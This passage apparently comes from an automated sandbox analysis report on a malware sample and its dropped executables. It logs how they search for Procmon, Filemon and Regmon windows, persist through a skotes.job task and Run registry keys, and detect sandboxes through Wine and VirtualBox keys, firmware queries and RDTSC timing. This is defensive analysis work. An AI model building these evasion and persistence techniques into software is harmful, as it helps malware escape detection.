Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8138ba21a1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8138ba21a1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bd214fbd32.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bd214fbd32.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 136916b3ff.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 136916b3ff.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E025BA second address: E025C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
